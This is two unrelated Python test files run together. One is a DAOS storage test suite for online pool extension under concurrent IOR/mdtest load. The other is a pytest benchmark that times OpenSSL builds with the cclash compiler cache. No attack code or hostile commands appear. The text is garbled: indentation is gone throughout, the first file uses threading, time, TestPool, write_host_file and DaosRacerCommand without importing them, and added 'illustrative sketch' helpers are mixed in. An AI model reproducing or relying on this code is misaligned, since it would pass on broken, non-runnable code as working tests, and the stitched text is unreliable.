from osa_utils import OSAUtils
from apricot import skipForTicket
from daos_utils import DaosCommand
class OSAOnlineExtend(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Extend test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
self.ranks = self.params.get("rank_list", '/run/test_ranks/*')
# Start an additional server.
self.extra_servers = self.params.get("test_servers",
"/run/extra_servers/*")
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
self.daos_racer = None
def daos_racer_thread(self):
"""Start the daos_racer thread."""
self.daos_racer = DaosRacerCommand(self.bin, self.hostlist_clients[0],
self.dmg_command)
self.daos_racer.get_params(self)
self.daos_racer.set_environment(
self.daos_racer.get_environment(self.server_managers[0]))
self.daos_racer.run()
def run_online_extend_test(self, num_pool, racer=False,
oclass=None, app_name="ior"):
"""Run the Online extend without data.
Args:
num_pool(int) : total pools to create for testing purposes.
racer(bool) : Run the testing along with daos_racer.
Defaults to False.
oclass(str) : Object Class (eg: RP_2G1, etc). Default to None.
app_name(str) : App (ior or mdtest) to run during the testing.
Defaults to ior.
"""
# Pool dictionary
pool = {}
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
# Start the daos_racer thread
if racer is True:
daos_racer_thread = threading.Thread(target=self.daos_racer_thread)
daos_racer_thread.start()
time.sleep(30)
for val in range(0, num_pool):
pool[val] = TestPool(
context=self.context, dmg_command=self.get_dmg_command(),
label_generator=self.label_generator)
pool[val].get_params(self)
pool[val].create()
pool[val].set_property("reclaim", "disabled")
        # Extend each pool to the additional ranks and targets
for val in range(0, num_pool):
threads = []
self.pool = pool[val]
# Start the additional servers and extend the pool
self.log.info("Extra Servers = %s", self.extra_servers)
self.start_additional_servers(self.extra_servers)
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool)
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Make sure system map has all ranks in joined state.
for retry in range(0, 10):
scan_info = self.get_dmg_command().system_query()
if not check_system_query_status(scan_info):
if retry == 9:
self.fail("One or more servers not in expected status")
else:
break
# Launch the IOR or mdtest thread
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_extend(self.pool.uuid, self.ranks)
self.print_and_assert_on_rebuild_failure(output)
pver_extend = self.get_pool_version()
self.log.info("Pool Version after extend %s", pver_extend)
            # Check that the pool version incremented after the pool extend
self.assertTrue(pver_extend > pver_begin,
"Pool Version Error: After extend")
        # Wait for the threads to finish
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
        # TODO: Check data consistency for IOR in the future.
        # Presently, daos_racer runs in parallel to IOR and data
        # consistency is checked only for the daos_racer objects
        # after the extend operation completes.
if racer is True:
daos_racer_thread.join()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool = pool[val]
self.pool.display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend(self):
"""Test ID: DAOS-4751
Test Description: Validate Online extend with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_csum
"""
self.log.info("Online Extend : With Checksum")
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_without_checksum(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend without checksum enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_without_csum
"""
self.log.info("Online Extend : Without Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_oclass(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with different
object class.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_oclass
"""
self.log.info("Online Extend : Oclass")
self.run_online_extend_test(1, oclass=self.test_oclass[0])
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_mdtest(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with mdtest application.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_mdtest
"""
self.log.info("Online Extend : Mdtest")
self.run_online_extend_test(1, app_name="mdtest")
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_with_aggregation(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with aggregation on.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_aggregation
"""
self.log.info("Online Extend : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_extend_test(1)
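# Illustrative sketch (not part of the DAOS test): the thread pattern used
# by run_online_extend_test() above -- start the I/O workload in a
# background thread, run the pool operation in the caller, then join the
# thread and surface any error it queued.  Everything below is standard
# library only and uses hypothetical names; the real test delegates to the
# OSAUtils helpers (run_ior_thread, out_queue, assert_on_exception).
def _example_online_operation(do_io, do_extend):
    """Run do_io() in a thread while do_extend() runs in the caller."""
    import queue
    errors = queue.Queue()
    def worker():
        try:
            do_io()
        except Exception as err:    # pylint: disable=broad-except
            errors.put(err)
    io_thread = threading.Thread(target=worker)
    io_thread.start()
    do_extend()                     # e.g. dmg pool extend
    io_thread.join()
    if not errors.empty():
        raise errors.get()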
|
test_performance.py
|
"""
Test cclash speed
"""
import sys
import os
import pytest
import subprocess
import threading
import test_performance_openssl as tpo
THISDIR = os.path.dirname(os.path.abspath(__file__))
CCLASH_BIN = os.path.join(os.path.dirname(THISDIR), "cclash", "bin", "debug")
CCLASH_EXE = os.path.join(CCLASH_BIN, "cl.exe")
if not os.path.exists(CCLASH_EXE):
CCLASH_BIN = os.path.join(os.path.dirname(THISDIR), "cclash", "bin", "release")
CCLASH_EXE = os.path.join(CCLASH_BIN, "cl.exe")
def run_server():
"""
Run the cclash server
:return:
"""
envs = setup_cclache_envs()
try:
        print(subprocess.check_output([CCLASH_EXE, "--cclash-server"], env=envs))
except subprocess.CalledProcessError as cpe:
        print(cpe.output)
raise
def setup_module():
"""
Before all tests
:return:
"""
    assert os.path.isfile(CCLASH_EXE), "you need to build cclash (Debug or Release) first"
    print("cclash is at {}".format(CCLASH_EXE))
tpo.get_vc_envs()
tpo.download_openssl()
setup_module.server = threading.Thread(target=run_server)
setup_module.server.start()
setup_module.server = None
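    # NOTE (assumption): the thread handle is deliberately dropped here; the
    # server keeps running in the background until teardown_module() stops
    # it with the "--cclash --stop" command.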
def teardown_module():
"""
Clean up the server
:return:
"""
envs = setup_cclache_envs()
subprocess.check_call([CCLASH_EXE, "--cclash", "--stop"], env=envs)
def setup_function(request):
"""
Before each test
:param request:
:return:
"""
envs = setup_cclache_envs()
tpo.setup_function(request)
    print("cachedir {}".format(envs["CCLASH_DIR"]))
    print(subprocess.check_output([CCLASH_EXE, "--cclash"], env=envs))
def setup_cclache_envs():
"""
return a dict of envs suitable for cclache to work with
:return:
"""
envs = dict(tpo.ENVS)
cachedir = os.path.join(os.getcwd(), "cclache_cachedir")
envs["CCLASH_DIR"] = cachedir
envs["CCLASH_Z7_OBJ"] = "yes"
envs["CCLASH_SERVER"] = "1"
return envs
def test_build_nocache():
"""
Time an openssl build with no caching involved at all
:return:
"""
tpo.build_openssl(None)
def build_withcclache_cold():
"""
Time an openssl build with a cold cache
:return:
"""
envs = setup_cclache_envs()
tpo.retry_delete(envs["CCLASH_DIR"])
tpo.build_openssl(CCLASH_BIN, envs)
def test_build_withcclache_01_warm():
"""
Time an openssl build with a warm cache
:return:
"""
#
# Benchmarking on my win10 AMD A6-3500 (3 core).
# On a good run this is 12.5 mins total,
#
# approx 450 sec cold
# approx 120 sec warm
#
# overhead is non-compiler configure or clean time
#
envs = setup_cclache_envs()
    print("-" * 80)
    print("Start cold cache")
    print("-" * 80)
build_withcclache_cold()
tpo.setup_function(None)
    print("-" * 80)
    print("Start warm cache")
    print("-" * 80)
tpo.build_openssl(CCLASH_BIN, envs)
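# Illustrative sketch (not part of the original file): a minimal helper for
# capturing the cold/warm timings quoted in the comment above.  It simply
# forwards its arguments to tpo.build_openssl(), which is assumed to behave
# as it is used elsewhere in this module; the helper is never called here.
def timed_build(*args):
    """Return the wall-clock seconds taken by one tpo.build_openssl() run."""
    import time
    start = time.time()
    tpo.build_openssl(*args)
    return time.time() - start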
if __name__ == "__main__":
pytest.main(sys.argv[1:])
|